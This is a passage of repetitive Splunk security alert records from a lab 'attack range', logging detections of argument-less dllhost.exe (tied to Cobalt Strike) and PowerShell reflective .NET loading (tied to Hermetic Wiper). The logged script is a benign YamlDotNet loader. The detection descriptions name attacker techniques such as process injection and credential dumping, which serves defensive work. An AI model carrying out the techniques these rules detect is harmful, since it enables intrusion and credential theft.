with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3f2c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3c58", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x3b24", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x37a8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3660", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3568", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x30c0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x2384", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1484", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664999733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T18:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T18:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664999733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T18:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T18:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664999733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T18:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T18:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664999733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T18:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T18:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", 